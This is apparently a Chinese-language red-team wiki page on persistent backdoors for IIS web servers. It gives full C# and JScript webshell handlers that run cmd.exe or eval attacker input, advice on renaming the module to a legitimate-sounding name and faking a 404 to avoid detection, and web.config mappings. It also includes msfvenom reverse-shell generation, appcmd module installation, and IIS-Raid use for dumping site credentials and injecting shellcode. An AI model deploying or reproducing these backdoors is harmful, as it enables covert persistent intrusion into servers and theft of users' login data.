IIS

IIS_Bin_Backdoor

From:https://github.com/WBGlIl/IIS_backdoor
IIS_backdoor_dll.dlๆ”พๅ…ฅ web ็›ฎๅฝ•็š„ bin ๆ–‡ไปถๅคนไธญ้…็ฝฎ web.config ๆ–‡ไปถ
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <modules>
      <add name="IIS_backdoor" type="IIS_backdoor_dll.IISModule" />
        </modules>
    </system.webServer>
</configuration>
IIS_backdoor_shell.exeๆ‰ง่กŒๅ‘ฝไปค
image
ไฝฟ็”จIISBackdoorๅคชๆ˜Žๆ˜พ๏ผŒๅฎนๆ˜“่ขซ็œ‹ๅ‡บๆ˜ฏๅŽ้—จ๏ผŒ่ฟ™้‡ŒๅฏนๅŽ้—จๆ”นๅ
image
image
image
้‡ๆ–ฐ็”Ÿๆˆ่งฃๅ†ณๆ–นๆกˆ๏ผŒdllๆ”พๅ…ฅbin็›ฎๅฝ•๏ผŒweb.configไฟฎๆ”นไธบ
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <modules>
      		<add name="UrlRoutingModule" type="UrlRoutingModule.IISModule" />
        </modules>
    </system.webServer>
</configuration>
ๆทปๅŠ ๅฎŒไน‹ๅŽไผš่‡ชๅŠจๅœจๆจกๅ—ไธญๆณจๅ†Œๅฅฝ
image
ๆ‰ง่กŒpayload๏ผŒmsf็”Ÿๆˆrawๆ ผๅผpayload๏ผŒ้€‰ๆ‹ฉshellcode้€‰้กน๏ผŒrawๆ–‡ไปถๆ‹–ๅ…ฅๅณๅฏ
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.raw
image

IIS_NETDLL_Spy

From:https://github.com/Ivan1ee/NetDLLSpy
ๅŽŸไฝœ่€…ๆๅŠไธ‰็งๆ–นๅผ๏ผŒ็ฌฌไธ€็ง็ผ–่ฏ‘ไปฃ็ ไธบDLLๆ–ฐๅปบaspxๆ–‡ไปถๅฎžไพ‹ๅŒ–ๅŽ้—จ็ฑปๆฅๆ‰ง่กŒๅ‘ฝไปค๏ผŒ็ฌฌไบŒ็งๆ˜ฏๅšhttphandlerๆ˜ ๅฐ„ๅฏๆŒ‡ๅฎšไธ€ไธชๅŽ็ผ€ๆ‰ง่กŒๅ‘ฝไปคไฟๅญ˜ๆ–‡ไปถๅœจwebๆœๅŠกๅ™จไธŠ๏ผŒๅ†่ฏปๅ–็ป“ๆžœใ€‚็ฌฌไธ‰็งๆ˜ฏไฝฟ็”จjsc.exe็ผ–่ฏ‘js่„šๆœฌ็”Ÿๆˆdll๏ผŒๆทปๅŠ ๆ˜ ๅฐ„่œๅˆ€่ฟžๆŽฅใ€‚
่ฟ™้‡Œๆ นๆฎๅŽŸไฝœ่€…็š„ไปฃ็ ๏ผŒ่ฟ›่กŒไบ†ไธ€ไธ‹็ฎ€ๅ•็š„ไฟฎๆ”น๏ผŒไฟฎๆ”นๅŽ็š„ๅŠŸ่ƒฝไธบๆทปๅŠ httphandlerๆ˜ ๅฐ„ๆŒ‡ๅฎšไธ€ไธชๅŽ็ผ€ๆ‰ง่กŒๅ‘ฝไปคๆ˜พ็คบๅœจ้กต้ขไธŠ๏ผŒไธ็”จไฟๅญ˜ๅœจๆœๅŠกๅ™จไธญๅ†่ฎฟ้—ฎใ€‚
ไปฃ็ 
using System;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Web;
namespace IsapiModules
{
	public class Handler : IHttpHandler
	{
		public bool IsReusable
		{
			get
			{
				return false;
			}
		}
		public void ProcessRequest(HttpContext context)
		{
			string input = context.Request.Form["InternetInformationService"];  //command
			if (context.Request.Form["microsoft"] == "iis")//do command
			{
				this.cmdShell(input);
			}
		}
		public void cmdShell(string input)
		{
			Process process = new Process();
			process.StartInfo.FileName = "cmd.exe";
			process.StartInfo.RedirectStandardOutput = true;
			process.StartInfo.UseShellExecute = false;
			process.StartInfo.Arguments = "/c " + input;
			process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
			process.Start();
			StreamReader output = process.StandardOutput;
			String result = output.ReadToEnd();
			output.Close();
			output.Dispose();
			HttpContext.Current.Response.Write(result);
		}
	}
}
ไฟๅญ˜ไธบ้šๆ„ๅŽ็ผ€๏ผŒไฝฟ็”จcsc็ผ–่ฏ‘ใ€‚
>C:\Windows\Microsoft.NET\Framework\v2.50727\csc.exe /t:library /r:System.Web.dll -out:C:\inetpub\wwwroot\Bin\SystemIO.dll C:\inetpub\wwwroot\bin\code.cs
image
Web.configๆ–‡ไปถๆทปๅŠ 
<system.webServer>
	<handlers> 
		<add name="PageHandlerFactory-ISAPI-2.0-32" path="*.xxx" verb="*" type="IsapiModules.Handler" resourceType="Unspecified" requireAccess="Script" preCondition="integratedMode" /> 
	</handlers> 
</system.webServer>
image
ๆ‰“ๅผ€IIS็ฎก็†ๅ™จ๏ผŒๅฏไปฅ็œ‹ๅˆฐๅค„็†ๆ˜ ๅฐ„็ฎก็†ๅ™จไธญๅทฒ็ปๆทปๅŠ ไบ†ๆจกๅ—ใ€‚
image
็Žฐๅœจ้šๆ„่ฎฟ้—ฎไธชxxxๅŽ็ผ€็š„ๆ–‡ไปถ
image
ๅธฆๅ‚ๆ•ฐ่ฎฟ้—ฎ
microsoft=iis&InternetInformationService=net user
image
image
็ฌฌไธ‰็ง่ฟžๆŽฅ่œๅˆ€๏ผŒ่ฟ™้‡ŒไนŸๅฏนไปฃ็ ไฟฎๆ”นไบ†ไธ€ไธ‹ใ€‚
import System; 
import System.Web; 
import System.IO; 
package IsapiModule
{ 
	public class Handler implements IHttpHandler
	{ 
		function IHttpHandler.ProcessRequest(context : HttpContext)
		{ 
			context.Response.Write("404 Not Found") 
			var I = context; 
			var Request = I.Request; 
			var Response = I.Response; 
			var Server = I.Server; 
			eval(context.Request["Internet"]); //pass
		} 
		function get IHttpHandler.IsReusable() : Boolean{ return true}
	}
}
ไฝฟ็”จjsc็ผ–่ฏ‘
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe /t:library -out:C:\inetpub\wwwroot\Bin\IsapiModule.Handler.dll C:\inetpub\wwwroot\bin\code.js
image
็ผ–่พ‘web.config๏ผŒๆทปๅŠ ๆ˜ ๅฐ„๏ผŒ่ฟ™้‡ŒๆŒ‡ๅฎš็š„ๅŽ็ผ€ๆ˜ฏ.iis
<system.webServer> 
<modules runAllManagedModulesForAllRequests="true"/> <directoryBrowse enabled="true"/>
<staticContent>
 <mimeMap fileExtension=".json" mimeType="application/json" /> 
 </staticContent> 
<handlers>
 <add name="PageHandlerFactory-ISAPI-2.0-32-1" path="*.iis" verb="*" type="IsapiModule.Handler" preCondition="integratedMode"/>
 </handlers>
</system.webServer>
ๅทฒ่‡ชๅŠจๅŠ ๅ…ฅไบ†ๆ˜ ๅฐ„ใ€‚็Žฐๅœจ้šไพฟ่ฎฟ้—ฎไธชiisๅŽ็ผ€็š„ๆ–‡ไปถใ€‚
image
image
ๅฏไฝฟ็”จ่œๅˆ€็›ดๆŽฅ่ฟžๆŽฅ
image
image

IIS_RAID

From:https://github.com/0x09AL/IIS-Raid
ๅœจvs2019ไธ‹็ผ–่ฏ‘
ๅœจFunctions.hไธญไฟฎๆ”น่ฟžๆŽฅๅฏ†็ ๏ผŒpassfileๆ˜ฏdumpไธ‹ๆฅ็š„ๅฏ†็ ไฟๅญ˜็š„ไฝ็ฝฎ๏ผŒcom_headerๆ˜ฏๅŽ้—จๅ’ŒๆœๅŠกๅ™จ้€šไฟก็š„่ฏทๆฑ‚ๅคดใ€‚
image
ๆ‰“ๅผ€้กน็›ฎไฟฎๆ”นๅฎŒไฝ ็š„ๅฏ†็ ๏ผŒ็›ดๆŽฅctrl+B็”Ÿๆˆ่งฃๅ†ณๆ–นๆกˆๅณๅฏ(่ฟ™้‡Œ็”Ÿๆˆ็š„ๆ˜ฏrelease็‰ˆๆœฌ)
Dllไผ ๅˆฐๆœๅŠกๅ™จ๏ผŒๆ”นไธชๅๅญ—๏ผŒๆ‰ง่กŒๆทปๅŠ ๆจกๅ—
>C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:IsapiDotNet /image:"c:\windows\system32\inetsrv\IsapiDotNet.dll" /add:true
image
ๅœจๆจกๅ—ไธญๅฏไปฅ็œ‹ๅˆฐๅทฒ็ปๅญ˜ๅœจไบ†
image
่ฟœ็จ‹่ฟžๆŽฅ
>python3 iis_controller.py --url http://192.168.0.98 --password thisismykey
ๆ‰ง่กŒๅ‘ฝไปค็š„ๆ–นๅผๆ˜ฏ
>cmd +ๅ‘ฝไปค
image
Dumpๅ‘ฝไปคๅฏไปฅdumpไธ‹ๆฅIIS็ซ™็‚น็š„็™ปๅฝ•็š„ไฟกๆฏ๏ผŒไฟๅญ˜ๅœจ่ฎพ็ฝฎ็š„ไฝ็ฝฎใ€‚
Injectๅฏไปฅๆ‰ง่กŒshellcode
Cs/msf็”Ÿๆˆrawๆ ผๅผ็š„shellcode
>inject ไฝ็ฝฎ
image

ๆœ€ๅŽๆ›ดๆ–ฐไบŽ

่ฟ™ๆœ‰ๅธฎๅŠฉๅ—๏ผŸ